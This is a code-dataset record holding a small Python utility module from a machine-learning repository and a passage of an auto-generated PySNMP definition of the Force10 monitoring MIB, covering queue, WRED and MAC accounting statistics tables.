0.62
0.053097
0.088496
0.106195
0
0
0
0
0
0
0
0.010563
0.147147
333
17
46
19.588235
0.785211
0.12012
0
0
0
0
0.041237
0
0
0
0
0
0
0
null
null
0.083333
0
null
null
0.083333
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
1
0
0
0
0
0
2
055c91bef8da3c2b5ab9913ec9ae41927e8fef83
1,514
py
Python
evkit/utils/misc.py
joel99/midlevel-reps
f0b4a4d8ccf09a0488cd18af24723172aff99446
[ "MIT" ]
120
2019-04-22T04:45:28.000Z
2022-03-23T01:53:17.000Z
evkit/utils/misc.py
joel99/midlevel-reps
f0b4a4d8ccf09a0488cd18af24723172aff99446
[ "MIT" ]
14
2019-06-12T08:21:21.000Z
2021-08-25T15:36:58.000Z
evkit/utils/misc.py
joel99/midlevel-reps
f0b4a4d8ccf09a0488cd18af24723172aff99446
[ "MIT" ]
19
2019-06-19T07:00:36.000Z
2022-03-24T07:18:30.000Z
import collections import torch import pprint import string remove_whitespace = str.maketrans('', '', string.whitespace) def cfg_to_md(cfg, uuid): ''' Because tensorboard uses markdown''' return uuid + "\n\n " + pprint.pformat((cfg)).replace("\n", " \n").replace("\n \'", "\n \'") + "" def is_interactive(): try: ip = get_ipython() return ip.has_trait('kernel') except: return False def is_cuda(model): return next(model.parameters()).is_cuda class Bunch(object): def __init__(self, adict): self.__dict__.update(adict) self._keys, self._vals = zip(*adict.items()) self._keys, self._vals = list(self._keys), list(self._vals) def keys(self): return self._keys def vals(self): return self._vals def compute_weight_norm(parameters): ''' no grads! ''' total = 0.0 count = 0 for p in parameters: total += torch.sum(p.data**2) # total += p.numel() count += p.numel() return (total / count) def get_number(name): """ use regex to get the first integer in the name if none exists, return -1 """ try: num = int(re.findall("[0-9]+", name)[0]) except: num = -1 return num def update_dict_deepcopy(d, u): # we need a deep dictionary update for k, v in u.items(): if isinstance(v, collections.Mapping): d[k] = update_dict_deepcopy(d.get(k, {}), v) else: d[k] = v return d
22.939394
110
0.579921
204
1,514
4.151961
0.460784
0.03778
0.021251
0.03778
0
0
0
0
0
0
0
0.008212
0.27609
1,514
65
111
23.292308
0.764599
0.112285
0
0.090909
0
0
0.031298
0
0
0
0
0
0
1
0.204545
false
0
0.090909
0.068182
0.522727
0.045455
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
0565ccb5f3f8b36de113f3a2bcbbc32675fef341
58,839
py
Python
pysnmp-with-texts/FORCE10-MONITORING-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
8
2019-05-09T17:04:00.000Z
2021-06-09T06:50:51.000Z
pysnmp-with-texts/FORCE10-MONITORING-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
4
2019-05-31T16:42:59.000Z
2020-01-31T21:57:17.000Z
pysnmp-with-texts/FORCE10-MONITORING-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
10
2019-04-30T05:51:36.000Z
2022-02-16T03:33:41.000Z
# # PySNMP MIB module FORCE10-MONITORING-MIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/FORCE10-MONITORING-MIB # Produced by pysmi-0.3.4 at Wed May 1 13:14:24 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ValueRangeConstraint, ConstraintsIntersection, ConstraintsUnion, ValueSizeConstraint, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsIntersection", "ConstraintsUnion", "ValueSizeConstraint", "SingleValueConstraint") f10Mgmt, = mibBuilder.importSymbols("FORCE10-SMI", "f10Mgmt") F10VlanID, F10CycloneVersion, F10ProcessorModuleType, F10PortPipeID, F10QueueID, F10SlotID = mibBuilder.importSymbols("FORCE10-TC", "F10VlanID", "F10CycloneVersion", "F10ProcessorModuleType", "F10PortPipeID", "F10QueueID", "F10SlotID") ifIndex, = mibBuilder.importSymbols("IF-MIB", "ifIndex") ObjectGroup, ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ObjectGroup", "ModuleCompliance", "NotificationGroup") Gauge32, Counter32, Integer32, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity, Bits, IpAddress, TimeTicks, Unsigned32, MibIdentifier, ObjectIdentity, NotificationType, Counter64 = mibBuilder.importSymbols("SNMPv2-SMI", "Gauge32", "Counter32", "Integer32", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity", "Bits", "IpAddress", "TimeTicks", "Unsigned32", "MibIdentifier", "ObjectIdentity", "NotificationType", "Counter64") DisplayString, TextualConvention, MacAddress, TruthValue = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention", "MacAddress", "TruthValue") f10MonitoringMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 6027, 3, 3)) f10MonitoringMib.setRevisions(('2008-12-18 12:00', '1906-01-20 00:00', '2000-11-02 10:30',)) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): if mibBuilder.loadTexts: f10MonitoringMib.setRevisionsDescriptions(('Force10 Monitoring MIB version 1.3 Added CPU Ingress Queue Unicast Statistics table. ', 'Force10 Monitoring MIB version 1.2 Added IP and ARP statistic objects that are not available in RFC1213. ', 'Force10 Monitoring MIB version 1.1',)) if mibBuilder.loadTexts: f10MonitoringMib.setLastUpdated('200812181200Z') if mibBuilder.loadTexts: f10MonitoringMib.setOrganization('Force10 Networks, Inc.') if mibBuilder.loadTexts: f10MonitoringMib.setContactInfo('Force10 Networks, Inc 1440 McCarthy Blvd Milpitas, CA 95035 (408) 571-3500 support@force10networks.com http://www.force10networks.com') if mibBuilder.loadTexts: f10MonitoringMib.setDescription('Force10 Monitoring MIB provides statistics and accounting for various Force10 products. ') f10MonGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 1)) f10MonQueue = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2)) f10MonMac = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3)) f10MonIfQueue = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4)) f10NetworkStat = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5)) f10IpStatistic = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 1)) f10ArpStatistic = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 2)) f10MonMibVersion = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("version1", 1), ("version1dot1", 2), ("version1dot2", 3)))).setMaxAccess("readonly") if mibBuilder.loadTexts: f10MonMibVersion.setStatus('current') if mibBuilder.loadTexts: f10MonMibVersion.setDescription(' version1(1) - initial version, define QOS Queue Statistics table. version1dot1(2) - support MAC Accounting (f10MonMac). version1dot2(3) - support Interface Queue Statistics Tables (f10MonIfQueue). ') f10MonQueueGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 1)) f10MonMaxQueue = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 1, 1), Integer32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10MonMaxQueue.setStatus('current') if mibBuilder.loadTexts: f10MonMaxQueue.setDescription('The maximum number of Force10 QOS queue supported by Force10 Interfaces. ') f10InQueueStatisticsTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2), ) if mibBuilder.loadTexts: f10InQueueStatisticsTable.setStatus('current') if mibBuilder.loadTexts: f10InQueueStatisticsTable.setDescription('The Force10 QOS Input Queue Statistics Table. This table provides Input Queue statistics for Force10 Interfaces. ') f10InQueueStatisticsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "FORCE10-MONITORING-MIB", "f10InQueueId")) if mibBuilder.loadTexts: f10InQueueStatisticsEntry.setStatus('current') if mibBuilder.loadTexts: f10InQueueStatisticsEntry.setDescription('An entry in the Force10 QOS Input Queue table. The Input Queue Statistics Table is indexed by the Interface and the Queue ID. The Interface index should be an valid ifIndex as defined in the RFC1213 MIB II Interface Table and the Queue ID should be a valid Force10 Queue ID. ') f10InQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 1), F10QueueID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10InQueueId.setStatus('current') if mibBuilder.loadTexts: f10InQueueId.setDescription('This is the second index of this table, it must be a valid Force10 QOS Queue ID. ') f10InQueueDropPackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 2), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10InQueueDropPackets.setStatus('current') if mibBuilder.loadTexts: f10InQueueDropPackets.setDescription(' ') f10InQueueBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 3), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10InQueueBytes.setStatus('current') if mibBuilder.loadTexts: f10InQueueBytes.setDescription(' ') f10InQueueMatchPackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 4), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10InQueueMatchPackets.setStatus('current') if mibBuilder.loadTexts: f10InQueueMatchPackets.setDescription(' ') f10InQueueMatchBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 5), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10InQueueMatchBytes.setStatus('current') if mibBuilder.loadTexts: f10InQueueMatchBytes.setDescription(' ') f10InQueueMatchBps = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 6), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10InQueueMatchBps.setStatus('current') if mibBuilder.loadTexts: f10InQueueMatchBps.setDescription(' ') f10InQueueCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 7), F10CycloneVersion()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10InQueueCycloneVersion.setStatus('current') if mibBuilder.loadTexts: f10InQueueCycloneVersion.setDescription('The linecard Cyclone hardware version. ') f10InQueueBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 8), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10InQueueBytesCount.setStatus('current') if mibBuilder.loadTexts: f10InQueueBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 2.0 (C2T2) hardware only. ') f10InQueuePktsCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 9), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10InQueuePktsCount.setStatus('current') if mibBuilder.loadTexts: f10InQueuePktsCount.setDescription('The cumulative number of packets passing through this queue. This object is available on Cyclone version 2.0 (C2T2) hardware only. ') f10OutQueueStatisticsTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3), ) if mibBuilder.loadTexts: f10OutQueueStatisticsTable.setStatus('current') if mibBuilder.loadTexts: f10OutQueueStatisticsTable.setDescription('The Force10 QOS Output Queue Statistics Table. This table provides Output Queue statistics for Force10 Interfaces. ') f10OutQueueStatisticsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "FORCE10-MONITORING-MIB", "f10OutQueueId")) if mibBuilder.loadTexts: f10OutQueueStatisticsEntry.setStatus('current') if mibBuilder.loadTexts: f10OutQueueStatisticsEntry.setDescription('An entry in the Output Queue table. The Output Queue Statistics Table is indexed by the Interface and the Queue ID. The Interface index should be an valid ifIndex as defined in the RFC1213 MIB II Interface Table and the the Queue ID should be a valid Force10 Queue ID. ') f10OutQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1, 1), F10QueueID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10OutQueueId.setStatus('current') if mibBuilder.loadTexts: f10OutQueueId.setDescription('This is the second index of this table, it must be a valid Force10 QOS Queue ID. ') f10OutQueuePackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1, 2), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10OutQueuePackets.setStatus('current') if mibBuilder.loadTexts: f10OutQueuePackets.setDescription(' ') f10OutQueueBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1, 3), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10OutQueueBytes.setStatus('current') if mibBuilder.loadTexts: f10OutQueueBytes.setDescription('The number of bytes in the queue. This object is available on Cyclone version 1.5 (CjTj) hardware only. ') f10OutQueueBps = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1, 4), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10OutQueueBps.setStatus('current') if mibBuilder.loadTexts: f10OutQueueBps.setDescription(' ') f10OutQueueCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1, 5), F10CycloneVersion()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10OutQueueCycloneVersion.setStatus('current') if mibBuilder.loadTexts: f10OutQueueCycloneVersion.setDescription('The linecard Cyclone hardware version. ') f10OutQueueBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1, 6), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10OutQueueBytesCount.setStatus('current') if mibBuilder.loadTexts: f10OutQueueBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 2.0 (C2T2) hardware only. ') f10WredStatisticsTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4), ) if mibBuilder.loadTexts: f10WredStatisticsTable.setStatus('current') if mibBuilder.loadTexts: f10WredStatisticsTable.setDescription('QOS WRED Statistics Table This table provides QOS WRED statistics for the Force10 Interfaces. ') f10WredStatisticsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "FORCE10-MONITORING-MIB", "f10WredQueueId")) if mibBuilder.loadTexts: f10WredStatisticsEntry.setStatus('current') if mibBuilder.loadTexts: f10WredStatisticsEntry.setDescription('An entry in the WRED Statistics table. The WRED Statistics Table is indexed by the Interface and the Queue ID. The Interface index should be an valid ifIndex as defined in the RFC1213 MIB II Interface Table and the Queue ID should be a valid Force10 Queue ID. ') f10WredQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 1), F10QueueID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredQueueId.setStatus('current') if mibBuilder.loadTexts: f10WredQueueId.setDescription('This is the second index of this table, it must be a valid Force10 QOS Queue ID. ') f10WredGreenName = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 2), DisplayString()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredGreenName.setStatus('current') if mibBuilder.loadTexts: f10WredGreenName.setDescription(' ') f10WredGreenThresholdLow = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 3), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredGreenThresholdLow.setStatus('current') if mibBuilder.loadTexts: f10WredGreenThresholdLow.setDescription(' ') f10WredGreenThresholdHigh = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 4), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredGreenThresholdHigh.setStatus('current') if mibBuilder.loadTexts: f10WredGreenThresholdHigh.setDescription(' ') f10WredGreenDropPackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 5), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredGreenDropPackets.setStatus('current') if mibBuilder.loadTexts: f10WredGreenDropPackets.setDescription(' ') f10WredGreenReserve1 = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 6), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredGreenReserve1.setStatus('current') if mibBuilder.loadTexts: f10WredGreenReserve1.setDescription(' ') f10WredGreenReserve2 = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 7), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredGreenReserve2.setStatus('current') if mibBuilder.loadTexts: f10WredGreenReserve2.setDescription(' ') f10WredYellowName = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 8), DisplayString()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredYellowName.setStatus('current') if mibBuilder.loadTexts: f10WredYellowName.setDescription(' ') f10WredYellowThresholdLow = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 9), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredYellowThresholdLow.setStatus('current') if mibBuilder.loadTexts: f10WredYellowThresholdLow.setDescription(' ') f10WredYellowThresholdHigh = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 10), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredYellowThresholdHigh.setStatus('current') if mibBuilder.loadTexts: f10WredYellowThresholdHigh.setDescription(' ') f10WredYellowDropPackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 11), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredYellowDropPackets.setStatus('current') if mibBuilder.loadTexts: f10WredYellowDropPackets.setDescription(' ') f10WredYellowReserve1 = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 12), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredYellowReserve1.setStatus('current') if mibBuilder.loadTexts: f10WredYellowReserve1.setDescription(' ') f10WredYellowReserve2 = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 13), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredYellowReserve2.setStatus('current') if mibBuilder.loadTexts: f10WredYellowReserve2.setDescription(' ') f10WredRedName = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 14), DisplayString()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredRedName.setStatus('current') if mibBuilder.loadTexts: f10WredRedName.setDescription(' ') f10WredRedThresholdLow = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 15), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredRedThresholdLow.setStatus('current') if mibBuilder.loadTexts: f10WredRedThresholdLow.setDescription(' ') f10WredRedThresholdHigh = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 16), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredRedThresholdHigh.setStatus('current') if mibBuilder.loadTexts: f10WredRedThresholdHigh.setDescription(' ') f10WredRedDropPackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 17), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredRedDropPackets.setStatus('current') if mibBuilder.loadTexts: f10WredRedDropPackets.setDescription(' ') f10WredRedReserve1 = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 18), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredRedReserve1.setStatus('current') if mibBuilder.loadTexts: f10WredRedReserve1.setDescription(' ') f10WredRedReserve2 = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 19), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10WredRedReserve2.setStatus('current') if mibBuilder.loadTexts: f10WredRedReserve2.setDescription(' ') f10MacGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 1)) f10MacAccounting = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2)) f10MacAccountingDestTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1), ) if mibBuilder.loadTexts: f10MacAccountingDestTable.setStatus('current') if mibBuilder.loadTexts: f10MacAccountingDestTable.setDescription('The MAC Accounting Destination Table. Each entry in the table provides the MAC accounting statistics from a specific Interface, VLAN ID, and the desired destination MAC Address. ') f10MacAccountingDestEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1), ).setIndexNames((0, "FORCE10-MONITORING-MIB", "f10MacAccInIfIndex"), (0, "FORCE10-MONITORING-MIB", "f10MacAccVlan"), (0, "FORCE10-MONITORING-MIB", "f10MacAccMacAddr")) if mibBuilder.loadTexts: f10MacAccountingDestEntry.setStatus('current') if mibBuilder.loadTexts: f10MacAccountingDestEntry.setDescription('An entry in the MAC Accounting Destination Table. The MAC Accounting Destination table is indexed by the input Interface, VLAN ID, and the destination MAC Address. ') f10MacAccInIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1, 1), Integer32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10MacAccInIfIndex.setStatus('current') if mibBuilder.loadTexts: f10MacAccInIfIndex.setDescription('The input Interface of this entry of the table. The value should be a valid ifIndex in the MIB II Interface Table. ') f10MacAccVlan = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1, 2), F10VlanID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10MacAccVlan.setStatus('current') if mibBuilder.loadTexts: f10MacAccVlan.setDescription('The VLAN ID. ') f10MacAccMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1, 3), MacAddress()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10MacAccMacAddr.setStatus('current') if mibBuilder.loadTexts: f10MacAccMacAddr.setDescription("The MAC Address that identifies this entry of the table. This is the destination MAC Address of the packets that's going through the Interface identified by f10MacAccInIfIndex. ") f10MacAccOutIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1, 4), Integer32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10MacAccOutIfIndex.setStatus('current') if mibBuilder.loadTexts: f10MacAccOutIfIndex.setDescription('The output Interface of this entry of the table. The value should be a valid ifIndex in the MIB II Interface Table. ') f10MacAccPackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1, 5), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10MacAccPackets.setStatus('current') if mibBuilder.loadTexts: f10MacAccPackets.setDescription('The number of packets going through this entry of the the table, identified by the Interface/MAC/VLAN. ') f10MacAccBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1, 6), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10MacAccBytes.setStatus('current') if mibBuilder.loadTexts: f10MacAccBytes.setDescription('The number of bytes traffic going through this entry of the table, identified by the Interface/MAC/VLAN. ') f10MonIfQueueGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 1)) f10IngQueueUnicastStatTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2), ) if mibBuilder.loadTexts: f10IngQueueUnicastStatTable.setStatus('current') if mibBuilder.loadTexts: f10IngQueueUnicastStatTable.setDescription('The Ingress Queue Unicast Statistics Table. This table provides Queue statistics for Ingress Unicast packets between Force10 linecards. ') f10IngQueueUnicastStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1), ).setIndexNames((0, "FORCE10-MONITORING-MIB", "f10IngUnicastSrcCard"), (0, "FORCE10-MONITORING-MIB", "f10IngUnicastDestCard"), (0, "FORCE10-MONITORING-MIB", "f10IngUnicastSrcPortPipe"), (0, "FORCE10-MONITORING-MIB", "f10IngUnicastDestPortPipe"), (0, "FORCE10-MONITORING-MIB", "f10IngUnicastQueueId")) if mibBuilder.loadTexts: f10IngQueueUnicastStatEntry.setStatus('current') if mibBuilder.loadTexts: f10IngQueueUnicastStatEntry.setDescription('An entry in the Ingress Queue Unicast Statistics table. The Ingress Queue Unicast Statistics Table is indexed by the source and destination linecard/portpipe and Queue ID. ') f10IngUnicastSrcCard = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 1), F10SlotID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastSrcCard.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastSrcCard.setDescription('This is the source linecard number. This is the first index of this table entry. ') f10IngUnicastDestCard = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 2), F10SlotID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastDestCard.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastDestCard.setDescription('This is the destination linecard number. This is the 3rd index of this table entry. ') f10IngUnicastSrcPortPipe = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 3), F10PortPipeID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastSrcPortPipe.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastSrcPortPipe.setDescription('This is the Force10 Cyclone PortPipe number of the source linecard. This is the 2nd index of this table entry. ') f10IngUnicastDestPortPipe = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 4), F10PortPipeID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastDestPortPipe.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastDestPortPipe.setDescription('This is the Force10 Cyclone PortPipe number of the destination linecard. This is the 4th index of this table entry. ') f10IngUnicastQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 5), F10QueueID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastQueueId.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastQueueId.setDescription('This is the Queue ID of this entry. This is the 5th index of this table entry. ') f10IngUnicastCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 6), F10CycloneVersion()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastCycloneVersion.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastCycloneVersion.setDescription('The linecard Cyclone hardware version. ') f10IngUnicastBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 7), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastBytes.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastBytes.setDescription('The number of bytes in the queue. This object is available on Cyclone version 1.5 (CjTj) hardware only. ') f10IngUnicastBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 8), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastBytesCount.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ') f10IngUnicastPacketCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 9), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastPacketCount.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastPacketCount.setDescription('The cumulative number of packets passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ') f10IngUnicastGreenMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 10), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastGreenMin.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastGreenMin.setDescription('The min threshold for Green packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ') f10IngUnicastGreenMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 11), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastGreenMax.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastGreenMax.setDescription('The max threshold for Green packets. The max threshold identifies the 